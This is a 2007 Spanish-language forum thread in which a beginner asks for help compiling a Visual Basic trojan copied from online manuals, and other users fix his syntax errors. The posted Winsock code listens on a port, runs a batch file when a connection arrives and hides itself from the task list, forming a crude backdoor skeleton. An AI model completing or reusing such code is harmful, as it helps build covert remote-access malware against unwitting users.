elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  empezando...con vb
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: empezando...con vb  (Leído 2,813 veces)
saliaz


Desconectado Desconectado

Mensajes: 309


Ver Perfil
empezando...con vb
« en: 4 Julio 2007, 15:14 pm »

ola soy nuevo en el foro....he estado mirando tutoriales y documentos por el foro, y he decido probar con un troyano en visual basic.....,la cuestion
 es que he copiado varios codigos de manuales de este foro y otras páginas, y nada por probar,he instalado la consola windsock y he seleccionado en nuevo proyecto exe estandar, he copiado los codigos igual que estaban en los manuales y por probar ... he ejecutado generar proyecto, pero me da error  en la linea 22( bLOQUE IF SIN END IF) ERROR DE COMPILACION



Private Sub Frame1_DragDrop(Source As Control, X As Single, Y As Single)
End Sub
Private Sub escuchar_Click()
On Error Resume Next
Ws.LocalPort = Text1.Text
Ws.Close
Ws.Listen
If Ws.State = 2 Then Label1.Caption = "Escuchando"
End Sub
Private Sub ws_ConnectionRequest(ByVal requestID As Long)
On Error GoTo error
Ws.Close
Ws.Accept requestID
Label3.Caption = Ws.RemoteHostIP
Shell "c:\ki.bat"
Timer1.Interval = 3000
error:
End Sub
Private Sub Command1_Click()
If winsock1.State = sckConnected Then
MsgBox "conection satisfactoria", vbInformation
End Sub    ------AQUI LINEA 22---------

Private Sub Form_Load()
Timer1 .Interval = 1
End Sub
Private Sub Timer1_Timer()
App TaskVisible = False
Timer1.Enabled = False
End Sub



GRACIAS...COMO SE ADUJUNTAN IMAGENES?GRACIAS... :-[ :-[


En línea

HALC12

Desconectado Desconectado

Mensajes: 67



Ver Perfil
Re: empezando...con vb
« Respuesta #1 en: 4 Julio 2007, 15:54 pm »

saliaz22
tu error es cosa de que te fijes bien
mira cuando tu colocas un if
debes cerrarlo colocando un end if
si no te va a salir ese error siempre si no me equivoco
quedaria asi
Private Sub Command1_Click()
If winsock1.State = sckConnected Then
MsgBox "conection satisfactoria", vbInformation
end if
End Sub    ------AQUI LINEA 22---------
pruebalo
me avisas si te sirvio o no
espero que te sirva
saludes


En línea

Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: empezando...con vb
« Respuesta #2 en: 4 Julio 2007, 16:32 pm »

Esto ni merece una respuesta.... Kerer hacer un programa sin kerer aprender a programar...

Se fuera mod en este foro borraria este tema....

Salu2
En línea

saliaz


Desconectado Desconectado

Mensajes: 309


Ver Perfil
Re: empezando...con vb
« Respuesta #3 en: 4 Julio 2007, 23:02 pm »

gracias por la ayuda halc12,la verdad es que no tengo mucha idea aun, y la ayuda se agradece...
a ti tughack, coño tambien me aburro de leer manuales, yo creo que un poquito de practica tambien va bien, por lo menos se hace mas ameno.....no les estoy dicendo a nadie que siga mis pasos...jeje, de todas formas gracias a los dos..
En línea

saliaz


Desconectado Desconectado

Mensajes: 309


Ver Perfil
Re: empezando...con vb
« Respuesta #4 en: 4 Julio 2007, 23:31 pm »

halc12 si que era eso......aunque despues de eso me he encontado mas errores en el  code(varios espacios en blanco que habia dejado) pero los he sabido solucionar....gracias otra vez.
En línea

saliaz


Desconectado Desconectado

Mensajes: 309


Ver Perfil
Re: empezando...con vb
« Respuesta #5 en: 4 Julio 2007, 23:59 pm »

 en este tambien me da error en lo que esta en negro:

Private Sub Command1_Click()
Winsock1.LocalPort = puerto.Text
Winsock1.Listen
End Sub

Private Sub Command2_Click()
Winsock1.Close
End Sub

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
txtrecibido = txtrecibido & "conexion cerrada:" & Winsock1.RemoteHostIP
Winsock1.Close
txtrecibido = "id de la solicitud de la conexión" & requestid& " de "&winsock1.remotehostip"
Winsock1.Close
End Sub

y me lo he copiado exactamente de un manual...?
En línea

Nakp
casi es
Ex-Staff
*
Desconectado Desconectado

Mensajes: 6.336

he vuelto :)


Ver Perfil WWW
Re: empezando...con vb
« Respuesta #6 en: 5 Julio 2007, 00:12 am »

es q has puesto unas comillas de mas :rolleyes: tienes errores de sintaxis :P queda asi:
Código
  1. txtrecibido = "id de la solicitud de la conexión" & requestid & " de " & winsock1.remotehostip

pd: por el amor de Dios!!! usen las etiquetas del codigo!!! hasta lo han mejorado para distintos tipos de lenguajes y no lo usan es un desperdicio :¬¬

salu2
« Última modificación: 6 Julio 2007, 19:16 pm por Nakpanzer » En línea

Ojo por ojo, y el mundo acabará ciego.
HALC12

Desconectado Desconectado

Mensajes: 67



Ver Perfil
Re: empezando...con vb
« Respuesta #7 en: 5 Julio 2007, 02:03 am »

SALIAZ
mira si lo que te dice   Nakpanzer  no te sale prueva con esto
 txtrecibido = "id de la solicitud de la conexión" & requestid & " de " & Winsock1.RemoteHostIP
 

si te fijas bien la diferencia casi no es nada
solo es cuestion de que mires bien varios tutoriales y los compares asi apremderas mas

mira Tughack  yo se que este error es demasiado simple como tu dices pero para alguien que esta aprendiendo puede pareserle dificil yo tambien he pasado por esto

En línea

Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: empezando...con vb
« Respuesta #8 en: 5 Julio 2007, 10:57 am »

Citar
mira Tughack  yo se que este error es demasiado simple como tu dices pero para alguien que esta aprendiendo puede pareserle dificil yo tambien he pasado por esto

Bueno ya no digo mas nada, cada uno tiene su forma de aprender, y se kieres saber se te paso eso tambien no lo has aprendido de la mejor forma. Solo es dificil kuando forzamos a k funcione sin tener kualkier nocion de lo k hacemos.

Salu2
En línea

saliaz


Desconectado Desconectado

Mensajes: 309


Ver Perfil
Re: empezando...con vb
« Respuesta #9 en: 6 Julio 2007, 15:25 pm »

lo prove primero como dijo nakpanzer pero me daba error y si que me funciono como halck12...eso lo dejo para vosotros que sois los expertos... :D
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Empezando con debian
GNU/Linux
lucaslopez0000 6 2,763 Último mensaje 11 Marzo 2013, 15:25 pm
por lucaslopez0000
Empezando con smoothwall
Redes
stricker333 0 871 Último mensaje 20 Mayo 2013, 11:41 am
por stricker333
empezando con wireshark!! ayudaa!!
Windows
chino99 1 1,593 Último mensaje 6 Agosto 2013, 13:22 pm
por chino99
empezando con la programacion
Programación General
bserr 2 1,153 Último mensaje 13 Febrero 2014, 00:21 am
por AngelFire
Empezando a...
Ingeniería Inversa
B€T€B€ 5 890 Último mensaje 14 Enero 2020, 23:32 pm
por B€T€B€
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines